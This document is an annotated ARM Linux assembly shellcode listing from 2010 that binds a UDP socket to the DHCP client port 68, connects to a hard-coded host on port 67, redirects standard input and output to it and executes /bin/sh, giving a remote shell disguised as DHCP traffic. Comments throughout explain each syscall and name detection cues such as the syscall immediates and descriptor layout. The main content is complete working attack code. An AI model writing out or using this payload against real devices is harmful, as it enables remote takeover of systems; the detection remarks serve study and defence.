ARM Bind Connect UDP Port 68
来源:gmail account dgodas 作者:Daniel 发布时间:2010-10-26  

/*
 * Title: arm-bind-connect-udp
 * Brief: Bind to port 68 on any local address and plug a udp shell
 *        onto port 67 on 192.168.0.1
 * Author: Daniel Godas-Lopez <gmail account dgodas>
 */

/*
 * Descriptor sweep. Assembled because the guard below is ".if 1".
 * Every svc in this file carries its syscall number in the instruction
 * immediate (0x00900000 + nr), the legacy OABI ARM Linux form; here
 * nr = 6, which the author's comment identifies as close. The fixed
 * 0x009000xx immediates are a usable static signature when scanning for
 * this payload.
 * Runtime view: roughly a thousand close() calls in a tight run, most of
 * them presumably failing on unopened descriptors, which stands out in a
 * syscall trace or audit log.
 */
.if 1
 /*
   close(1024), close(1023), ..., close(3)
   (the counter runs downward; descriptors 0-2 are not closed here)
  */

 mov %r1, $1024  /* r1 = current fd, starting at the top */
1: mov %r0, %r1  /* r0 = fd argument, reloaded each pass */
 svc 0x00900006  /* close(r0); result ignored */
 subs %r1, %r1, $1
 subs %r2, %r1, $3 /* sets flags from r1 - 3; r2 is scratch */
 bpl 1b   /* loop while r1 - 3 >= 0, so the last fd closed is 3 */
.endif

 /*
   soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

   The three arguments are pushed as an array and passed by pointer:
   svc immediate 0x00900066 is 0x00900000 + 0x66 (102), the multiplexed
   socket entry point, with r0 = operation selector and r1 = pointer to
   the argument words. The return value is not checked.
  */

 mov %r0, $2  /* AF_INET */
 mov %r1, $2  /* SOCK_DGRAM */
 mov %r2, $17  /* IPPROTO_UDP */
 push {%r0, %r1, %r2} /* args[0..2] on the stack, r0 at the lowest address */
 mov %r0, $1  /* socket */
 mov %r1, %sp  /* r1 = &args[0] */
 svc 0x00900066
 add %sp, %sp, $12 /* drop the three argument words */

 mov %r6, %r0  /* r6 = soc_des */

 /*
   bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));

   Local endpoint is 0.0.0.0:68. UDP 68 is the DHCP client port, so at
   the port level this socket looks like a DHCP client; it is also a
   privileged port (below 1024), so on a default Linux configuration the
   bind presumably succeeds only in a process that holds
   CAP_NET_BIND_SERVICE. A listener on UDP 68 that is not the host's DHCP
   client is worth flagging in socket inventories.
   The return value is not checked.
  */

.if 0 /* r0 == r6 already */
 mov %r0, %r6  /* soc_des */
.endif

 mov %r1, $0x44000000
 add %r1, $2  /* port = 68, family = 2 (AF_INET) */
   /* word 0x44000002: assumes little-endian, giving bytes 02 00 00 44 */
 sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
 push {%r1, %r2}  /* 8 bytes of sockaddr_in: family/port word, then address */
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in); only 8 bytes were pushed, the rest is whatever sits above on the stack */
 
 push {%r0, %r1, %r2} /* args: soc_des, &sockaddr_in, length */
 mov %r0, $2  /* bind */
 mov %r1, %sp  /* r1 = &args[0] */
 svc 0x00900066  /* 0x00900000 + 0x66: multiplexed socket call, selector in r0 */
 add %sp, %sp, $20 /* drop 3 argument words + 2 sockaddr words */

 /*
   connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));

   Remote endpoint is the hard-coded 192.168.0.1:67. UDP 67 is the DHCP
   server port, so together with the local port 68 the flow has the same
   port pair as DHCP; the payload will not be BOOTP-structured, which is
   what content inspection on 67/68 can key on.
   On a datagram socket connect only fixes the default peer, so nothing
   is expected on the wire at this step. The return value is not checked.
  */

 mov %r0, %r6  /* soc_des */

 mov %r1, $0x43000000
 add %r1, $2  /* port = 67, family = 2 (AF_INET) */
   /* word 0x43000002: assumes little-endian, giving bytes 02 00 00 43 */
 mov %r2, $0x1000000
 add %r2, %r2, $0xa800
 add %r2, $0xc0  /* addr = 192.168.0.1 */
   /* word 0x0100a8c0, built in three steps; bytes c0 a8 00 01 in memory */
 push {%r1, %r2}  /* 8 bytes of sockaddr_in: family/port word, then address */
 mov %r1, %sp  /* pointer to sockaddr_in */
 mov %r2, $16  /* sizeof(struct sockaddr_in); only 8 bytes were pushed */

 push {%r0, %r1, %r2} /* args: soc_des, &sockaddr_in, length */
 mov %r0, $3  /* connect */
 mov %r1, %sp  /* r1 = &args[0] */
 svc 0x00900066  /* 0x00900000 + 0x66: multiplexed socket call, selector in r0 */
 add %sp, %sp, $20 /* drop 3 argument words + 2 sockaddr words */

 /*
   dup2(soc_des,2);
   dup2(soc_des,1);
   dup2(soc_des,0);

   The descriptor passed is r6, expected to hold the UDP socket; there is
   no separate client socket in this file. The loop runs 2, 1, 0.
   Afterwards stdin, stdout and stderr all refer to the UDP socket, which
   is the state to look for when triaging a suspicious process
   (fds 0-2 all pointing at one UDP socket).
  */

 mov %r1, $2  /* r1 = target fd, counting down from 2 */
1: mov %r0, %r6  /* r0 = source fd, reloaded each pass */
 svc 0x0090003f  /* 0x00900000 + 0x3f (63): dup2(r0, r1); result ignored */
 subs %r1, %r1, $1
 bpl 1b   /* loop while r1 >= 0 */

 /*
   execve("/bin/sh", parms, env);

   The path string, argv[0] string and both pointer arrays are built in
   registers and placed on the stack by a single five-word push.
   After the push (sp lowered by 20):
     sp+0   r1 = old sp - 4 = sp+16   argv[0], points at "sh"
     sp+4   r2 = 0                    argv terminator, also the empty env array
     sp+8   r3 = "/bin"               first half of the filename
     sp+12  r4 = "/sh" + NUL          second half of the filename
     sp+16  r5 = "sh" + NUL NUL       argv[0] string
   Byte order of the packed strings assumes little-endian.
   What an endpoint sensor sees: an exec of /bin/sh with argv[0] "sh", an
   empty environment, and fds 0-2 already redirected by the code before
   it.
  */

 sub %r1, %sp, $4 /* argv[0] = "sh" */
 sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
 mov %r3, $0x2f  /* r7 is used as a scratch register for each character below */
 mov %r7, $0x62
 add %r3, %r7, lsl $8
 mov %r7, $0x69
 add %r3, %r7, lsl $16
 mov %r7, $0x6e
 add %r3, %r7, lsl $24 /* '/'  'b'  'i'  'n'  */
 mov %r4, $'/'
 mov %r7, $'s'
 add %r4, %r7, lsl $8
 mov %r7, $'h'
 add %r4, %r7, lsl $16 /* '/'  's'  'h'  0x00 */
 mov %r5, $'s'
 mov %r7, $'h'
 add %r5, %r7, lsl $8 /* 's'  'h'  0x00 0x00 */

 push {%r1, %r2, %r3, %r4, %r5} /* lowest register at the lowest address */

 add %r0, %sp, $8 /* filename ptr */
 add %r1, %sp, $0 /* argv ptr */
 add %r2, %sp, $4 /* env ptr */

 svc 0x0090000b  /* 0x00900000 + 0x0b (11): execve(r0, r1, r2) */


 